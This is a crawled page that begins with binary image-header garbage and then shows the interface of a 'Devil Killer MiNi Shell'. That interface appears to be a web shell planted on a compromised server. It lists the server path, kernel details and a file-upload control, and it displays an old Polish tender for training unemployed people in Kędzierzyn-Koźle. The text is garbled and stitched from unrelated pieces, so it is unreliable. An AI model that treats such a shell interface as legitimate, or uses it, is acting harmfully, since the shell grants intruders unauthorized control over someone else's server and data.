JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/192140-N-2010.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu</b><br>
<b>Numer ogłoszenia: 192140 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Anny 11, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 077 4827041 do 43, faks 077 4827041.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: 
Część 1
Pracownik administracyjno-księgowy z językiem angielskim.
Szkolenie jest przeznaczone  dla 14 bezrobotnych.
Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych
Część 2
Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą TIG 
Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą MAG
Szkolenie jest przeznaczone  dla 14  bezrobotnych.
Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych
Część 3
Sprzedawca-kucharz
Szkolenie jest  przeznaczone dla 14 bezrobotnych.
Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych
Część4
Przedsiębiorczość. Jak założyć i prowadzić własną firmę.
Szkolenie jest przeznaczone dla 30 bezrobotnych  
Usługi szkolenia w dziedzinie zarządzania - 80532000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.53.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Posiadają aktualny wpis do rejestru instytucji szkoleniowych wydawany przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej oraz potwierdzenie, że wpis został zaktualizowany na 2010 rok.
2)Kopia odpisu z właściwego rejestru /wpis do ewidencji działalności gospodarczej, KRS/
3)Kopia aktualnego atestu na szkolenie spawaczy /metody zgodne z przedmiotem zamówienia/ pod merytorycznym nadzorem Instytutu Spawalnictwa./dotyczy tylko części 2 zamówienia- spawanie/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) W okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonali należycie co najmniej 3 usługi szkoleniowe dla minimum 10 osób każda, w następujących zakresach tematycznych związanych z przedmiotem zamówienia: część 1- Pracownik administracyjno-księgowy z językiem angielskim; część 2 - Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą TIG, Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą MAG; 
część 3  - Sprzedawca-kucharz; część 4 - Przedsiębiorczość. Jak założyć i prowadzić własną firmę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonają usługę szkoleniową w dostosowanych ilościowo i jakościowo pomieszczeniach /do zajęć praktycznych i teoretycznych/, których liczba i pojemność jest adekwatna do wielkości grup szkoleniowych, jak również harmonogramu zajęć, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, zgodnie z rozporządzeniem MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy  (tekst jednolity Dz. U.z 2003r. Nr 169, poz. 1650 z późniejszymi zmianami). 
 2) Udostępnią bezrobotnym sprzęt, urządzenia np.: rzutniki, tablice, wyposażenie sal wykładowych, na czas realizacji zamówienia: 
Część1: każdy z uczestników szkoleń powinien mieć dostęp do urządzeń i sprzętu wykorzystywanego przy realizacji szkoleń tj. Wykonawca powinien zapewnić salę wykładową przystosowaną i wyposażone w odpowiednie pomoce udostępnione bezrobotnym na czas realizacji zamówienia. Sale maja być wyposażone w co najmniej 15 stanowisk komputerowych, wyposażonych w odpowiednie /zgodne z przedmiotem zamówienia, aktualne/ oprogramowanie umożliwiające prawidłową realizację zamówienia zgodnie z opisem przedmiotu.
Część 2: każdy z uczestników szkolenia powinien mieć dostęp do urządzeń i sprzętu wykorzystywanego przy realizacji szkoleń tj. Wykonawca powinien zapewnić salę wykładową przystosowaną i wyposażoną w odpowiednie pomoce udostępnione bezrobotnym na czas realizacji zamówienia oraz odpowiednio przystosowaną bazę techniczną do zajęć  praktycznych /Wykonawca ma zapewnić co najmniej 6 stanowisk spawalniczych/ niezbędną do prawidłowej realizacji zamówienia.
Część 3: każdy z uczestników szkolenia powinien mieć dostęp do urządzeń i sprzętu wykorzystywanego przy realizacji szkoleń tj. Wykonawca powinien zapewnić salę wykładową przystosowaną i wyposażoną w odpowiednie pomoce udostępnione bezrobotnym na czas realizacji zamówienia. Sale mają być wyposażone w co najmniej 15 stanowisk komputerowych z odpowiednim tzn. zgodnym z przedmiotem zamówienia, aktualnym oprogramowaniem umożliwiającym prawidłową realizację zamówienia, a ponadto udostępnić bezrobotnym na czas szkolenia co najmniej 7 kas fiskalnych. Wykonawca ma zapewnić bezrobotnym odpowiednie miejsce odbywania zajęcia praktycznych z zakresu sporządzania i serwowania dań, które będzie przystosowane i wyposażone w odpowiednie pomoce /przybory kuchenne, naczynia, kuchenki elektryczne lub gazowe, piekarniki, drobny sprzęt AGD itp./oraz zaplecze sanitarne.
Część 4: każdy z uczestników szkoleń powinien mieć dostęp do urządzeń i sprzętu wykorzystywanego przy realizacji szkoleń tj. Wykonawca powinien zapewnić salę wykładową przystosowaną i wyposażone w odpowiednie pomoce udostępnione bezrobotnym na czas realizacji zamówienia. Sale maja być wyposażone w co najmniej 16 stanowisk komputerowych, wyposażonych w odpowiednie /zgodne z przedmiotem zamówienia, aktualne/ oprogramowanie umożliwiające prawidłową realizację zamówienia.
Ilość sprzętu, urządzeń i wyposażenia musi być adekwatna do wielkości grup szkoleniowych, jak również harmonogramu zajęć. 
4) Zapewnią każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe wymienione w opisie przedmiotu zamówienia tzn.: 
Część 1: Wymaga się, żeby Wykonawca zapewnił każdemu bezrobotnemu materiały niezbędne do prawidłowej realizacji szkolenia. Każdy uczestnik ma otrzymać co najmniej: jeden notatnik /A4/, jeden długopis, jeden podręcznik dotyczący zagadnień księgowych MiŚP, podręczniki lub inne materiały dotyczące zagadnień administracyjno-księgowych, kadrowo-płacowych, co najmniej jeden podręcznik do nauki języka angielskiego od podstaw, 
Część 2:  Wykonawca zobowiązuje się zapewnić każdemu uczestnikowi szkolenia niezbędne ubranie robocze, środki ochrony osobistej  /maski, okulary, obuwie, rękawice, odzież ochronna/ oraz materiały szkoleniowe w postaci: notatników /A4 co najmniej jeden/, długopisów/co najmniej jeden/, niezbędnych materiałów ksero, książek, materiałów do przeprowadzenia zajęć praktycznych z zakresu spawania itp.
Część - 3:  Wykonawca zobowiązuje się zapewnić każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe w postaci: notatników /format A4 co najmniej jeden/, długopisów /co najmniej jeden/, niezbędnych materiałów ksero, książek, płyt CD itp., które po zakończeniu szkolenia przejdą w ich posiadanie. Wykonawca zobowiązuje się zapewnić bezrobotnym biorącym udział w szkoleniu produkty spożywcze, a także udostępnić programy komputerowe /np. SUBIEKT/ niezbędne do przeprowadzenia zajęć praktycznych. 
Część 4: Wykonawca zobowiązuje się zapewnić każdemu uczestnikowi szkolenia niezbędne materiały szkoleniowe w postaci: notatników /format A4 co najmniej jeden/, długopisów /co najmniej jeden/, niezbędnych materiałów ksero, książek, płyt CD itp., które po zakończeniu szkolenia przejdą w ich posiadanie. Wymaga się, żeby Wykonawca zapewnił każdemu bezrobotnemu co najmniej jeden podręcznik dotyczący podejmowania i prowadzenia działalności gospodarczej. Wykonawca ma również zakupić w ramach szkolenia i wydać na własność każdemu uczestnikowi kwalifikowany podpis elektroniczny - kompletne urządzenie do składania bezpiecznego podpisu elektronicznego, składające się między innymi z certyfikatu kwalifikowanego, karty kryptograficznej (nośnik certyfikatu) oraz czytnika kart kryptograficznych. Zawarty w zestawie certyfikat kwalifikowany ma dawać możliwość:
- podpisania dowolnego pliku, 
- weryfikacji podpisu pod dokumentem, 
- podpisywania wielu plików przy jednokrotnym podaniu kodu PIN. 
Oraz mieć zastosowanie między innymi do:
- składanie formularzy do KIO (Krajowej Izby Odwoławczej), 
- składania pism procesowych w sądowym postępowaniu upominawczym, 
- kontaktowania się drogą elektroniczną z ZUSem (w programie Płatnik), 
- składania wniosków i pozyskiwania wypisów do KRSu, 
- składania e-deklaracji podatkowych, 
- podpisywania raportów do GIIF (Generalny Inspektor Informacji Finansowej), 
- korespondencji z GIODO (Generalny Inspektor Ochrony Danych Osobowych), 
- podpisywania faktur elektronicznych, 
- składania e-deklaracji do UFG (Ubezpieczeniowy Fundusz Gwarancyjny), 
- korespondencji z urzędami administracji publicznej, 
- zawierania umów cywilno-prawnych w formie elektronicznej, 
- udziału w aukcjach i przetargach elektronicznych. 
Powyższy certyfikat ma być ważny przez co najmniej 2 lata od daty otrzymania go przez bezrobotnego /bezrobotni mają go otrzymać co najmniej w dniu w którym zaczyna się przeszkolenie z zakresu użytkowania bezpiecznego podpisu elektronicznego/.
Udostępniane oraz wydawane bezrobotnym materiały dydaktyczne mają być aktualne, dostosowane do wymagań stawianych przez pracodawców, zgodne z obowiązującymi aktami prawnymi /Zał. nr 7D do formularza oferty/ .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zapewnią osoby do prowadzenia zajęć dydaktycznych posiadające odpowiednie kwalifikacje, kierunkowe wykształcenie, dodatkowe kwalifikacje lub uprawnienia związane z przedmiotem zamówienia. 
Osoby prowadzące zajęcia dydaktyczne musza deklarować się - oświadczyć, że w ciągu ostatnich trzech lat prowadziły zajęcia na co najmniej 5 różnych szkoleniach zgodnych z przedmiotem zamówienia. Przy czym powyższe doświadczenie musi dotyczyć zajęć dydaktycznych pokrewnych tematycznie z zajęciami, które będą prowadzić w ramach wybranej części zamówienia. 
2) Zapewnią nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia. Wymaga się, aby co najmniej opiekun szkolenia lub osoba sprawująca nadzór pedagogiczny nad realizacją szkolenia posiadała uprawnienia pedagogiczne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie, że usługa szkoleniowa zostanie wykonana w dostosowanych ilościowo i jakościowo pomieszczeniach z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, zgodnie z rozporządzeniem MPiPS z dnia 26 września 1997 r.w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy  (tekst jednolity Dz. U.z 2003r. Nr 169, poz. 1650 z późniejszymi zmianami) 
2) Oświadczenie, że Wykonawca zobowiązuje się zapewnić uczestnikom szkolenia niezbędne materiały szkoleniowe wymienione w opisie przedmiotu zamówienia, które po zakończeniu szkolenia przejdą w ich posiadanie. Udostępniane oraz wydawane bezrobotnym materiały dydaktyczne mają być aktualne, dostosowane do wymagań stawianych przez pracodawców, zgodne z obowiązującymi aktami prawnymi 
3) Zobowiązanie osób sprawujących nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia, że będą do dyspozycji Wykonawcy na okres wykonywania zamówienia oraz, że posiadają przygotowanie pedagogiczne. Należy załączyć kopię zaświadczenia.
4) Oświadczenie  art. 22 ust 1 pkt. 1-4 ustawy Prawo zamówień publicznych
5) Ramowy plan szkolenia.  
6) Szczegółowy program szkolenia.
7) Oświadczenie, że Wykonawca zaangażuje się w pozyskiwanie miejsc pracy lub stażu dla uczestników realizowanego szkolenia lub  zorganizuje spotkania z pracodawcami poszukującymi pracowników na stanowiska związane z realizowanym przez Wykonawcę przedmiotem zamówienia /część 1- Pracownik administracyjno-księgowy z językiem angielskim; część 2 - Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą TIG, Spawanie blach i rur ze stali ferrytycznych spoinami pachwinowymi metodą MAG; część 3  - Sprzedawca-kucharz/. Nie dotyczy części 4 zamówienia. Powyższe warunki dotyczą firm zapewniających zatrudnienie lub staż na terenie powiatu Kędzierzyn-Koźle.
8) Oświadczenie o posiadaniu przez Wykonawcę certyfikatów jakości usług. W przypadku posiadania certyfikatu należy załączyć jego kopię.
9) Preliminarz kosztów szkolenia z wyszczególnieniem elementów składowych
10) Kopia wzoru dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji (proszę załączyć wzór), który otrzymają bezrobotni po ukończeniu z wynikiem pozytywnym szkolenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian umowy w stosunku do treści zobowiązania, na podstawie którego dokonano wyboru Wykonawcy; w szczególnie uzasadnionych przypadkach o obiektywnym charakterze niezależnych od Wykonawcy lub korzystnych dla Zamawiającego i leżących w interesie publicznym, a których nie można było przewidzieć w chwili składania ofert dotyczących: 

- miejsca szkolenia - jednakże, nowe miejsce odbywania zajęć musi spełniać warunki wymienione w SWIZ i nie może być gorsze niż wymienione w ofercie zarówno pod względem użyteczności jak i lokalizacji,
- osób prowadzących szkolenie - jednakże, zmiana kadry dydaktycznej nie może pociągnąć za sobą obniżenia jakości szkolenia a wykładowcy  muszą spełniać warunki wymienione w SWIZ i nie mogą posiadać niższych kwalifikacji niż osoby zaproponowane w ofercie,
- zmiany daty realizacji szkolenia,
- zmiany kosztów osobogodziny szkolenia, zmiany kosztów szkolenia jednego uczestnika.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pup-kkozle.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kędzierzynie-Koźlu
ul. Anny 11, 47-200 Kędzierzyn-Koźle
pok.19 II piętro w godzinach 8-14, codziennie oprócz sobót i niedziel.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Kędzierzynie-Koźlu
ul. Anny 11, 47-200 Kędzierzyn-Koźle
pok. nr 8 I piętro /sekretariat urzędu/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkoleń dla bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu.</p>
